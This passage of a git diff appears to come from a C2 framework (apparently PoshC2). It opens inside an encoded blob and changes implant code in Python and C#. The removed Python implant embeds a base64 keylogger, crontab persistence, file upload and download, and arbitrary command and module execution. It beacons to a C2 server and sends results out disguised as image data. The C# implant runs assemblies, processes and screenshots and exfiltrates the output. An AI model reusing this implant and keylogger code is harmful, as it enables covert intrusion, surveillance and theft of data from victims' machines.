JaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBMk13MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSMlYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" + modb64logger = base64.b64decode(b64logger) + modpayload = modb64logger.replace("REPLACEME",filename) + exec(modpayload) + pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() + returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) + return returnval + +def dfile(fname): + if fname: + with open(fname, "rb") as image_file: + imgbytes = image_file.read() + return "0000100001" + imgbytes + +def ufile(base64file, fname): + fname = fname.replace('"','') + filebytes = base64.b64decode(base64file) + try: + output_file = open(fname, 'w') + output_file.write(filebytes) + output_file.close() + return "Uploaded file %%s" %% fname + except Exception as e: + return "Error with source file: %%s" %% e + +def sai(delfile=False): + import uuid + filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess + returnval = "Ran Start Another Implant - File dropped: %%s" %% filename + p = subprocess.Popen(["sh", filename]) + if delfile: + p = subprocess.Popen(["rm", filename]) + returnval = "Ran Start Another Implant - File removed: %%s" %% filename + return returnval + +def persist(): + import uuid, os + dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) + os.mkdir(dircontent) + filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess as s + s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) + return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename + +def remove_persist(): + import subprocess as s + s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) + return "Removed user persistence via crontab: \\r\\n**must delete files manually**" + +def decrypt_bytes_gzip( key, data): + iv = data[0:16] + aes = get_encryption(key, iv) + data = aes.decrypt( data ) + import StringIO + import gzip + infile = StringIO.StringIO(data[16:]) + with gzip.GzipFile(fileobj=infile, mode="r") as f: + data = f.read() + return data + +while(True): + cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") + if cstr < kd: + key = "%s" + uri = "%s" + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + try: + time.sleep(timer) + ua='%s' + if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) + else: req=urllib2.Request(server,headers={'User-agent':ua}) + res=urllib2.urlopen(req); + html = res.read() + except Exception as e: + E = e + #print "error %%s" %% e + #print html + if html: + try: + returncmd = decrypt( key, html ) + returncmd = returncmd.rstrip('\\0') + + if "multicmd" in returncmd: + + returncmd = returncmd.replace("multicmd","") + returnval = "" + splits = returncmd.split("!d-3dion@LD!-d") + + for split in splits: + taskId = split[:5].strip().strip('\x00') + cmd = split[5:].strip().strip('\x00') + if cmd[:10] == "$sleeptime": + timer = int(cmd.replace("$sleeptime = ","")) + elif cmd[:13] == "download-file": + fname = cmd.replace("download-file ","") + returnval = dfile(fname) + elif cmd[:11] == "upload-file": + fullparams = cmd.replace("upload-file ","") + params = fullparams.split(":") + returnval = ufile(params[1],params[0]) + elif cmd[:19] == "install-persistence": + returnval = persist() + elif cmd[:14] == "get-keystrokes": + returnval = keylog() + elif cmd[:18] == "remove-persistence": + returnval = remove_persist() + elif cmd[:19] == "startanotherimplant": + returnval = sai(delfile=True) + elif cmd[:28] == "startanotherimplant-keepfile": + returnval = sai() + elif cmd[:10] == "loadmodule": + module = cmd.replace("loadmodule","") + exec(module) + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + if s.getvalue(): + returnval = s.getvalue() + else: + returnval = "Module loaded" + except Exception as e: + returnval = "Error with source file: %%s" %% e + + elif cmd.startswith("linuxprivchecker"): + args = cmd[len('linuxprivchecker'):].strip() + args = args.split() + pycode_index = args.index('-pycode') + encoded_module = args[pycode_index +1] + args.pop(pycode_index) + args.pop(pycode_index) + pycode = base64.b64decode(encoded_module) + process = ['python', '-c', pycode] + pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode + import subprocess + returnval = subprocess.check_output(['python', '-c', pycode] + args) + + elif cmd[:6] == "python": + module = cmd.replace("python ","") + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + + returnval = s.getvalue() + + except Exception as e: + returnval = "Error with source file: %%s" %% e + + else: + try: + returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) + except subprocess.CalledProcessError as exc: + returnval = "ErrorCmd: %%s" %% exc.output + + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + opener = urllib2.build_opener() + postcookie = encrypt(key, taskId) + data = base64.b64decode(random.choice(icoimage)) + dataimage = data.ljust( 1500, '\x00' ) + dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) + if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + res=urllib2.urlopen(req); + response = res.read() + + except Exception as e: + E = e + # print "error %%s" %% e \ No newline at end of file diff --git a/Files/Sharp.cs b/Files/Sharp.cs index 3718a8d..f871eb6 100644 --- a/Files/Sharp.cs +++ b/Files/Sharp.cs @@ -376,51 +376,53 @@ public class Program var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries); foreach (string c in split) { - tasksrc = c; - if (c.ToLower().StartsWith("exit")) + var taskId = c.Substring(0, 5); + cmd = c.Substring(5, c.Length - 5); + tasksrc = cmd; + if (cmd.ToLower().StartsWith("exit")) { exitvt.Set(); break; } - else if (c.ToLower().StartsWith("loadmodule")) + else if (cmd.ToLower().StartsWith("loadmodule")) { - var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase); + var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module)); output.AppendLine("Module loaded sucessfully"); - tasksrc = "Module loaded sucessfully"; } - else if (c.ToLower().StartsWith("upload-file")) + else if (cmd.ToLower().StartsWith("upload-file")) { - var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase); var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries); Console.WriteLine("Uploaded file to: " + splitargs[1]); var fileBytes = Convert.FromBase64String(splitargs[0]); System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes); tasksrc = "Uploaded file sucessfully"; } - else if (c.ToLower().StartsWith("download-file")) + else if (cmd.ToLower().StartsWith("download-file")) { - var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase); var file = File.ReadAllBytes(path.Replace("\"", "")); var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, "", true, fileChuck); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); + continue; } - else if (c.ToLower().StartsWith("get-screenshotmulti")) + else if (cmd.ToLower().StartsWith("get-screenshotmulti")) { bool sShot = true; int sShotCount = 1; while(sShot) { var sHot = RunAssembly("run-exe Core.Program Core get-screenshot"); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, strOutput.ToString(), true); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); Thread.Sleep(240000); sShotCount++; if (sShotCount > 100) { @@ -431,21 +433,22 @@ public class Program output.Append("[+] Multi Screenshot Ran Sucessfully"); } } + continue; } - else if (c.ToLower().StartsWith("listmodules")) + else if (cmd.ToLower().StartsWith("listmodules")) { var appd = AppDomain.CurrentDomain.GetAssemblies(); output.AppendLine("[+] Modules loaded:").AppendLine(""); foreach (var ass in appd) output.AppendLine(ass.FullName.ToString()); } - else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")) + else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) { - output.AppendLine(RunAssembly(c)); + output.AppendLine(RunAssembly(cmd)); } - else if (c.ToLower().StartsWith("start-process")) + else if (cmd.ToLower().StartsWith("start-process")) { - var proc = c.Replace("'", "").Replace("\"", ""); + var proc = cmd.Replace("'", "").Replace("\"", ""); var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase); pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase); var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase); @@ -458,7 +461,7 @@ public class Program output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd()); p.WaitForExit(); } - else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) + else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon")) { var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?[0-9]{1,9})(?[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase); var mch = bcnRgx.Match(c); @@ -482,19 +485,19 @@ public class Program output.AppendLine(strOutput.ToString()); var sb = strOutput.GetStringBuilder(); sb.Remove(0, sb.Length); - if (tasksrc.Length > 200) + if (tasksrc.Length > 200) // This is not used? tasksrc = tasksrc.Substring(0, 199); - var task = Encryption(Key, tasksrc); + var enTaskId = Encryption(Key, taskId); var coutput = Encryption(Key, output.ToString(), true); var outputBytes = System.Convert.FromBase64String(coutput); var sendBytes = ImgGen.GetImgData(outputBytes); - GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes); + GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes); } } } catch (Exception e) { - var task = Encryption(Key, "Error"); + var task = Encryption(Key, "Error"); var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true); var outputBytes = System.Convert.FromBase64String(eroutput); var sendBytes = ImgGen.GetImgData(outputBytes); diff --git a/HTML.py b/HTML.py index 66fb532..7dada64 100644 --- a/HTML.py +++ b/HTML.py @@ -209,8 +209,8 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] - //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -333,7 +333,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -355,7 +355,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -372,13 +372,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: @@ -404,7 +404,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") diff --git a/Implant.py b/Implant.py index 29d58db..461dde5 100644 --- a/Implant.py +++ b/Implant.py @@ -41,516 +41,10 @@ NEWKEY8839394%s4939388YEKWEN IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) - self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random -hh = '%s' -timer = %s -icoimage = [%s] -urls = [%s] -kd=time.strptime("%s","%%d/%%m/%%Y") -useragent = "" -imbase = "%s" - -def keylog(): - # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py - import os,time,base64,subprocess,uuid - filename = "/tmp/%%s" %% uuid.uuid4().hex - b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBMk13MEtJQ